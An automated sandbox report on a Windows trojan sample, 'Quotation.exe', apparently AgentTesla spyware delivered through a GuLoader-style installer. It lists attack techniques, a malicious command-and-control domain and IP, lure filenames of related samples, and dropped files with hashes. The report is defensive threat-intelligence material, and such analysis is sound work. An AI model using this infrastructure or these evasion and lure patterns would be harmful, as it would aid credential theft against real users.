Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	1 Application Window Discovery	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation.exe	39%	ReversingLabs	Win32.Trojan.Nemesis

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://showpiece.trillennium.biz	0%	Avira URL Cloud	safe
http://mail.showpiece.trillennium.biz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.18.14	true	false	high
drive.usercontent.google.com	142.250.184.225	true	false	high
api.ipify.org	172.67.74.152	true	false	high
showpiece.trillennium.biz	67.23.226.139	true	true	unknown
mail.showpiece.trillennium.biz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://showpiece.trillennium.biz	Quotation.exe, 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/$K	Quotation.exe, 00000009.00000002.2499184774.0000000004CB8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.showpiece.trillennium.biz	Quotation.exe, 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	Quotation.exe, 00000009.00000002.2499184774.0000000004C38000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/03	Quotation.exe, 00000009.00000002.2519704345.0000000037219000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Quotation.exe, 00000009.00000002.2499184774.0000000004CB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error...	Quotation.exe	false		high
https://api.ipify.org/t	Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.i.lencr.org/0	Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
67.23.226.139	showpiece.trillennium.biz	United States	33182	DIMENOCUS	true
172.217.18.14	drive.google.com	United States	15169	GOOGLEUS	false
142.250.184.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549339
Start date and time:	2024-11-05 15:06:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/12@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 80% Number of executed functions: 72 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Quotation.exe

Simulations

Behavior and APIs

Time	Type	Description
10:51:43	API Interceptor	33109x Sleep call for process: Quotation.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
67.23.226.139	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Revised PI 28 08 2024.exe	Get hash	malicious	AgentTesla	Browse
	PI 22_8_2024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	COTIZACION 19 08 24.exe	Get hash	malicious	AgentTesla	Browse
	pago.exe	Get hash	malicious	AgentTesla	Browse
	invoice.exe	Get hash	malicious	AgentTesla	Browse
	SijLVTsunN.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
172.67.74.152	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2e	Get hash	malicious	Unknown	Browse	172.67.74.152
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	104.26.12.205
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	REVISED PO NO.8389.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.12.205
	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	DB_DHL_AWB_001833022AD.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Payslip_October_2024.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	CFuejz2dRu.exe	Get hash	malicious	Discord Token Stealer	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIMENOCUS	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br	Get hash	malicious	HTMLPhisher	Browse	107.161.183.172
	http://prabal-gupta-lcatterton-com.athuselevadores.com.br/	Get hash	malicious	HTMLPhisher	Browse	107.161.183.172
	nklarm7.elf	Get hash	malicious	Unknown	Browse	109.73.163.173
	rtransferencia-.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	138.128.178.242
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	98.142.105.97
	https://docsend.com/view/63jvhxyyj7pwxerg	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	64.37.50.172
CLOUDFLARENETUS	09Iz0ja549.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	RFQABCO004806L____________________pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	104.21.5.155
	En88bvC0fc.exe	Get hash	malicious	FormBook	Browse	172.67.153.83
	Employee bonus and payroll 74ae5652.pdf	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	188.114.96.3
	nCYUA8nqsg.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	mBms4I508x.exe	Get hash	malicious	FormBook	Browse	104.21.15.203
	POP (2).pdf	Get hash	malicious	Unknown	Browse	162.159.61.3
	http://kra13.me	Get hash	malicious	Unknown	Browse	104.21.51.34
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	RFQABCO004806L____________________pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, XWorm	Browse	172.67.74.152
	Scan- 00399905 Payment slip.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	1q4pQ8ms4w.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	dZJo0ZAVUx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	3Ri17T8XLh.exe	Get hash	malicious	XWorm	Browse	172.67.74.152
	TEKJ09876545678002.cmd.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	REVISED PO NO.8389.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
37f463bf4616ecd445d4a1937da06e19	ImDbHt7AA4.exe	Get hash	malicious	DarkCloud	Browse	142.250.184.225 172.217.18.14
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.184.225 172.217.18.14
	HATCH COVER REQ_AW24 New Order Request.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 172.217.18.14
	EL GINER.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.225 172.217.18.14
	rFactura02Presupuesto_9209Urbia_pdf_.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.184.225 172.217.18.14
	MSI18A.dll	Get hash	malicious	Unknown	Browse	142.250.184.225 172.217.18.14
	z120X20SO__UK__EKMELAMA.exe	Get hash	malicious	GuLoader, Remcos	Browse	142.250.184.225 172.217.18.14
	Request for quotation for the pumps.vbs	Get hash	malicious	FormBook, GuLoader	Browse	142.250.184.225 172.217.18.14
	PerceivedFurthermore.exe	Get hash	malicious	LummaC Stealer	Browse	142.250.184.225 172.217.18.14
	build.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.184.225 172.217.18.14

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dll	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla	Browse
	1364. 2024.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Quote_220072.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483 (2).exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	12288
Entropy (8bit):	5.97694153396788
Encrypted:	false
SSDEEP:	192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
MD5:	D6F54D2CEFDF58836805796F55BFC846
SHA1:	B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
SHA-256:	F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
SHA-512:	CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: COTIZACION.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: 1364. 2024.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quote_220072.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483 (2).exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Music\antithetic.ini

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.264578373902383
Encrypted:	false
SSDEEP:	3:apWPWPjNLCNHiy:UPRCNHiy
MD5:	58AC0B5E1D49D0EE1AED2FE13FAE6C7A
SHA1:	02C8384573D47CA39F2E2ACA32B275861EC59A93
SHA-256:	624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
SHA-512:	8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[broadspread]..slyngvrk=houghband..

C:\Users\user\overlays\besvangredes\Emmens.udk

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	482519
Entropy (8bit):	1.2446382063037653
Encrypted:	false
SSDEEP:	1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
MD5:	1D099F6122F4B7C8A78925726B59E5C3
SHA1:	EEA154E31FF04CD1A2CED0193F7633ED219CFA47
SHA-256:	1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
SHA-512:	F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........

C:\Users\user\overlays\besvangredes\Induktionskogezoner.Nsk

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	351137
Entropy (8bit):	7.676102619266156
Encrypted:	false
SSDEEP:	6144:PdJiCE/E9q19n90UdvyMJsOKp1CJ/VNMaiC05MHhrRkwjJjK5U:PLh4vJOg7KZp1CJ/ti752hrRjOW
MD5:	153D8E26703DB4537452788634D68F3A
SHA1:	4583B70F72FB96E9A9FB0EEB265004F78B0D3DD6
SHA-256:	A63DBF74F1BBFF5707AEB80ED80DED99B4E83878D78E9E2970DF9E0ED0E8B76E
SHA-512:	B785A175A3485A621C1623E3E1CE4D08469ABCA14CF1159D06C0E7ADAC3A12E1632A055A67A259A65E280B7A5F012AEB4DF544C96B8E7B54301E2B850F4C58A8
Malicious:	false
Reputation:	low
Preview:	..............r."..............ll............S......U.....................uu...;.........G....GG....................................TT............rr.e...........@.....V.............==..hhh...........q...f.......................J............!...:............j....&U.G]..<~.....t.o.>.?vX._.....K....dJ..........C.....{}u.Df..^[.x.].g...b.j..LM..;.&.6...e..!..".H....@.W.5..S........0G.....s.+.h...).O.....3..Z.N..w.......r.V..oV,......`...\c..9..F..T....0...\|....(.z.R..i..Q..-........."..#....l.%.aR....m..C.p.....4...A....f..-ph...8...YkyP...JU.G]..<~.....t.o.>.?vX._.....e.t...f....@..K....dJ.....{}u.Df..^[.x.].g...b.j..LM..;.&.6...e..!..".....s.l..H....@.W.5..S{G.....s.+.h.f.......>.).O.....3..Z.N..w.......r.Vs`...\c..9..F..T....0...\|.......1.......(.z.R..i..Q..-.1..#.......^....a..-.%.aR....m..C.p.....4...Anph...8...YkyP...J!....f.g..).G]..<~.....t.o.>.?vX._.....K....dJ.....b.......!..{}u.Df..^[.x.].g...b.j..LM..........$.&.6...e..!..".H...

C:\Users\user\overlays\besvangredes\Proprietrer.bet

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	288955
Entropy (8bit):	1.2577770955280814
Encrypted:	false
SSDEEP:	768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
MD5:	0B62328C4966F6B879B3C13B7FBD9C0D
SHA1:	6DD81F12E739E81E06778067513ED1178A06AFC9
SHA-256:	645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
SHA-512:	2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................\|............................................................[.................................................\.......................v...........o...................................m...........

C:\Users\user\overlays\besvangredes\Smalfilmerens.Sem

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	149734
Entropy (8bit):	4.624147867948753
Encrypted:	false
SSDEEP:	3072:YlQkdicTlaY9bRNq/yW2AmPCeRWOUUdr+jHH:8Qkdi4llG/yW+7QB7
MD5:	5AFE09B3AEF2B87007D437EA12C40C5A
SHA1:	32C89636169419C6C84C9E8AE4BEB0575E2A60A1
SHA-256:	700B075118B5B9F6B87F91D93737846483BFAE61ABB562454AE416B246C7792F
SHA-512:	B2B5D8C1AC33EB3E2D0F67B475E1027D84EEDB794BBC3EA765ABADD528CD166861C87AB72E56B197D994C90BB65CB194A28BFC03795BEBC0591F667BC0EDC547
Malicious:	false
Reputation:	low
Preview:	.........`......55.<.................ff.......]............X....^^^^..oo...))...............................................2..........qq.........ZZ..........@..............M...........A................GG.........\\\\\\.)))............bb..................3.....eeee..........''''...............v.......U...f.^.''..........Q.....llllll................bb..............UU..g.................<....7.................g..J...]...VVVV...............zzz...-....U..r.............OOO...........22.$.2..............GG.................7...........*..G......\|\|\|..............................p..v.............,....."....77777...rr....D...AAAAA.........2..&....M.......FF.......T...ddd.......D....>..iiii................&&.......I.....S.uuu........................................00..............................5.kk............2..............=.???.....................i.....66........XXX..eeee................xxxxxx..\..............\......................................K..........."".....J............oo......[[[.

C:\Users\user\overlays\besvangredes\Trikstanks.pra

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	340974
Entropy (8bit):	1.254605943274635
Encrypted:	false
SSDEEP:	768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
MD5:	49BE0E06F2E4F0CCFFB46426EE262642
SHA1:	FF9C56C31A824E4CA087705C23D01D288FE34239
SHA-256:	A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
SHA-512:	27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
Malicious:	false
Preview:	.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................\|. .....

C:\Users\user\overlays\besvangredes\boyaus.rom

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	392462
Entropy (8bit):	1.241128723454179
Encrypted:	false
SSDEEP:	768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
MD5:	F130EC3095DBECEDC791D8C58A59040C
SHA1:	DAD2300B487F31F199520E1B41AB02B7D677B352
SHA-256:	A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
SHA-512:	8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
Malicious:	false
Preview:	..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................

C:\Users\user\overlays\besvangredes\gear.dra

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	433786
Entropy (8bit):	1.255949132332751
Encrypted:	false
SSDEEP:	768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
MD5:	53FF1A157920AE92C9BF891D453D6B65
SHA1:	B7BF3B7B16048F38132D8ACCA841130D73DB44C3
SHA-256:	FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
SHA-512:	E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
Malicious:	false
Preview:	......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................

C:\Users\user\overlays\besvangredes\jagtfalk.ill

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	374902
Entropy (8bit):	1.250991222921627
Encrypted:	false
SSDEEP:	1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
MD5:	169115C751DDA5E021E8C86E8454B26D
SHA1:	5A8254634C0C726BB18E42E626EAEB581D532DCD
SHA-256:	ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
SHA-512:	2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
Malicious:	false
Preview:	.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........

C:\Users\user\overlays\besvangredes\regill.ful

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	489048
Entropy (8bit):	1.245615736901525
Encrypted:	false
SSDEEP:	1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
MD5:	B4FB425BAF217F31E91AAB39ABF66DCD
SHA1:	03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
SHA-256:	4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
SHA-512:	E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
Malicious:	false
Preview:	.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^.......................................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`.............................)1.............q..............4....

C:\Users\user\overlays\besvangredes\sortlistningens.txt

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	4.247837387326688
Encrypted:	false
SSDEEP:	6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
MD5:	46003C65AA12A0EBE55662F0141186DC
SHA1:	739652C3375018DAFFB986302A7D3E8D32770B41
SHA-256:	2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
SHA-512:	59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
Malicious:	false
